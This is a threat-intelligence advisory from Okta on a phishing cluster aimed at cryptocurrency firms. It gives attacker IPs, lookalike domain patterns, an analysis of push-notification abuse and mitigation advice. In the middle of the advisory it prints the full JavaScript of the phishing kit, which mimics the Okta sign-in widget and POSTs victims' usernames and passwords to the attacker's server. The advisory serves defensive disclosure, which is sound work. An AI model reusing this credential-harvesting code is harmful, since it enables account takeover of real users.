Human-operated phishing kit targets cryptocurrency firms

Executive Summary

In May 2025, the Okta Threat Intelligence team observed a currently unattributed cluster (O-UNC-020) of phishing-related activity that predominantly targets organizations operating in the cryptocurrency space.

O-UNC-020 was first observed in October 2024, targeting organizations operating in cryptocurrency, email marketing, marketing automation, sales automation and CRM.

This advisory details the observed Tactics, Techniques, and Procedures (TTPs) and provides relevant Indicators of Compromise (IOCs) associated with this active threat.

The campaign should be of particular interest to any organization that secures access to browser-based applications using password as a primary authenticator and push notifications as a second factor. The phishing kit used by the attacker - which we analyze below - serves to capture and send a target’s username and password to an attacker-controlled server. The targeted user is presented with a page designed to appear as though additional content is loading, as the human operators of the phishing kit enter the credentials from their own browser to trigger a push notification.

This information is provided for informational and intelligence purposes to enable organizations to understand and mitigate the risks posed by this campaign.

Threat Analysis

Analysis of the May 2025 campaign identified the following infrastructure used to host the malicious phishing pages, which present a fraudulent Okta Sign-In Widget:

• 91.212.166[.]185 - AS198953 - Proton66 OOO
• 196.251.84[.]3 - AS401120 - cheapy.host LLC
• 193.24.123[.]162 - AS200593 - PROSPERO OOO

And used the following domain patterns:

• <customer>-sso.com
• <customer>-okta.com
• login-<customer>.com
• mail-<customer>.com

Account takeover activity

Following a successful compromise of user credentials, the threat actor(s) were observed attempting to authenticate from the following IP addresses:

• 154.221.58[.]232 - AS202656 - XServerCloud
• 213.209.137[.]210 - AS62240 - Clouvider
• 46.232.37[.]58 - AS62240 - Clouvider

During authentication attempts, the threat actor was observed using IP addresses associated with Proxyline.net, a large Russian datacenter proxy provider. This service offers an extensive network of high-speed IPv4 and IPv6 HTTP and SOCKS proxy servers, which can be used to route traffic through various global locations. ProxyLine advertises a no-log policy and accepts cryptocurrency payments. These features make it particularly attractive to cybercriminals, state-sponsored actors and other malicious entities seeking to maintain anonymity and evade detection.

Phishing kit characteristics

• The phishing kit presents a two-step login process: first asking for a Username (input ID usernameInput) and then, after a simulated delay, for a Password (input ID passwordInput).
• The collected username and password, along with a static csrf_token (which is part of the mimicry), are sent via an AJAX POST request to a relative path api/v1/login on the phishing server.
• After submitting the credentials, the page simulates a processing delay (setTimeout) and then attempts to redirect the user to a page named /oauth_await. This is another attacker-controlled page designed to further the illusion that the user’s primary credentials were entered successfully.
• The javascript code, which is executed directly in the user's web browser and redirection to oauth_await page, indicates the real-time collection of credentials by a human operator. The attackers enter the harvested credentials at the target’s production Okta service in an attempt to trigger a push notification. A user that assumes they entered the correct password may accept the push notification generated by the attacker without checking the context displayed in the message.
• The redirect_uri in the dynamically generated URL (<org>.okta.com%2Fenduser%2Fcallback) is legitimate, and the attacker may try to redirect the user via this link after stealing their credentials.

<script>

if (!window.location.href.includes('?')) {

function generateRandomString(length) {

const charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

let result = '';

for (let i = 0; i < length; i++) {

result += charset.charAt(Math.floor(Math.random() * charset.length));

}

return result;

}

const clientId = sessionStorage.getItem('client_id') || 'okta.' + generateRandomString(32);

sessionStorage.setItem('client_id', clientId);

const codeChallenge = sessionStorage.getItem('code_challenge') || generateRandomString(43);

sessionStorage.setItem('code_challenge', codeChallenge);

const nonce = sessionStorage.getItem('nonce') || generateRandomString(22);

sessionStorage.setItem('nonce', nonce);

const state = sessionStorage.getItem('state') || generateRandomString(40);

sessionStorage.setItem('state', state);

let currentPage = window.location.pathname;

currentPage = currentPage.replace(/\.php$/, '');

const newUrl = `${currentPage}?

client_id=${clientId}&code_challenge=${codeChallenge}&code_challenge_method=S256&nonce=
${nonce}&redirect_uri=

https%3A%2F%2Fredacted.okta.com%2Fenduser%2Fcallback&response_type=
code&state=${state}&scope=openid%20

profile%20email%20okta.users.read.self%20okta.users.manage.self
%20okta.internal.enduser.read%20okta.internal.endus

er.manage%20okta.enduser.dashboard.read%20okta.enduser.dashboard.manage
%20okta.myAccount.sessions.manage`

;

window.location.href = newUrl;

}

$(document).ready(function() {

$('#usernameInput').keyup(function() {

if ($(this).val() == '') {

$("#inputDispaly").show();

$("#roleAlertDisplay").show();

} else {

$("#inputDispaly").hide();

}

});

$('#passwordInput').keyup(function() {

if ($(this).val() == '') {

$("#displayPasswordErrorText").show();

$("#passwordContainerError").show();

} else {

$("#displayPasswordErrorText").hide();

}

});

$('#username-saving').on('submit', function(event) {

event.preventDefault();

});

$('#password-saving').on('submit', function(event) {

event.preventDefault();

});

$('#usernameInput').on('keyup', function(event) {

if (event.key === 'Enter' || event.keyCode === 13) {

event.preventDefault();

$('#next_username_button').click();

}

});

$('#passwordInput').on('keyup', function(event) {

if (event.key === 'Enter' || event.keyCode === 13) {

event.preventDefault();

$('#next_pass_button').click();

}

});

$('.password-toggle').on('click', function() {

const $passwordInput = $('#passwordInput');

const $showIcon = $('.button-show');

const $hideIcon = $('.button-hide');

if ($passwordInput.attr('type') === 'password') {

$passwordInput.attr('type', 'text');

$showIcon.hide();

$hideIcon.show();

} else {

$passwordInput.attr('type', 'password');

$showIcon.show();

$hideIcon.hide();

}

});

$('#input36').on('click', function() {

const isChecked = $(this).prop('checked');

if (isChecked) {

$('#input36_check').addClass('checked');

} else {

$('#input36_check').removeClass('checked');

}

});

const loginUsername = $("#next_username_button");

const loginPassword = $("#next_pass_button");

loginUsername.click(function() {

const username = $('#usernameInput').val();

$("#inputDispaly").hide();

$("#roleAlertDisplay").hide();

if (username == '') {

$("#inputDispaly").show();

$("#roleAlertDisplay").show();

return;

}

loginUsername.attr('disabled', true);

loginUsername.addClass('link-button-disabled btn-disabled');

$("#username-saving").addClass('o-form-saving');

setTimeout( function (){

$(".okta-username-section").hide();

$(".okta-password-section").show();

$("#insertUsernameValue").text(username);

$('#passwordInput').focus();

return

}, 1500);

});

loginPassword.click(function() {

const password = $('#passwordInput').val();

$("#displayPasswordErrorText").hide();

$("#passwordContainerError").hide();

if (password == '') {

$("#displayPasswordErrorText").show();

$("#passwordContainerError").show();

return;

}

loginPassword.attr('disabled', true);

loginPassword.addClass('link-button-disabled btn-disabled');

$("#password-saving").addClass('o-form-saving');

const payload = {

username: $('#usernameInput').val(),

password: $('#passwordInput').val(),

csrf_token: $("input[name=csrf_token]").val(),

page: 'login'

};

$.ajax({

url: 'api/v1/login',

type: 'POST',

data: payload,

success: function(response) {

setTimeout( function (){

window.location.href = "oauth_await";

return

}, 1500);

},

error: function(err) {

console.log('Error sending data:', err);

alert('Error, please refresh the page');

}

});

});

});

</script>

Threat Response

What we’re doing
We’re actively engaged in the following activities to mitigate this threat:

• Continuously monitoring for newly registered phishing domains and infrastructure associated with this campaign.
• Proactively filing abuse reports with relevant registrars and hosting providers to initiate takedown requests for identified malicious sites.
• Providing guidance and assistance to organizations to enhance the security of their Okta environments and investigate any suspicious activity related to potentially compromised accounts.
• Publishing updates to this advisory as we observe further activity.

Protective Controls

Recommendations for customers:

• Enroll users in strong authenticators such as Okta FastPass, FIDO2 WebAuthn and smart cards and enforce phishing-resistance in policy. If any exceptions are made for Okta Verify Push notifications, we recommend enforcing number challenges for all sign-in attempts or for high-risk sign-in attempts.
• Okta authentication policies can also be used to restrict access to user accounts based on a range of customer-configurable prerequisites. We recommend administrators restrict access to sensitive applications to devices that are managed by Endpoint Management tools and protected by endpoint security tools. For access to less sensitive applications, require registered devices (using Okta FastPass) that exhibit indicators of basic hygiene.
• Deny or require higher assurance for requests from rarely-used networks. With Okta Network Zones, access can be controlled by location, ASN (Autonomous System Number), IP, and IP-Type (which can identify known anonymizing proxies).
• Okta Behavior and Risk evaluations can be used to identify requests for access to applications that deviate from previously established patterns of user activity. Policies can be configured to step-up or deny requests using this context.
• Train users to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. Make it easy for users to report potential issues by configuring End User Notifications and Suspicious Activity Reporting.
• Document, evangelize and adhere to a standardized process for validating the identity of remote users that contact IT support personnel, and vice versa.
• Take a "Zero Standing Privileges" approach to administrative access. Assign administrators Custom Admin Roles with the least permissions required for daily tasks, and require dual authorization for JIT (just-in-time) access to more privileged roles.
• Apply IP Session Binding to all administrative apps to prevent the replay of stolen administrative sessions.
• Enable Protected Actions to force re-authentication whenever an administrative user attempts to perform sensitive actions.

Observing and responding to phishing infrastructure:

• Review application logs (Okta logs, web proxies, email systems, DNS servers, firewalls) for any evidence of communication with any such suspicious domains.
• Monitor the domains regularly to see if the contents change.
• If content hosted on the domain violates copyright or legal marks, consider providing evidence and issuing a takedown request with the domain registrar and/or web hosting provider.

Appendix A: Indicators of Compromise

This is an ongoing investigation, and additional IOCs may be identified as the campaign evolves. Organizations are advised to remain vigilant and implement the recommended mitigation strategies. Below are the IOCs observed.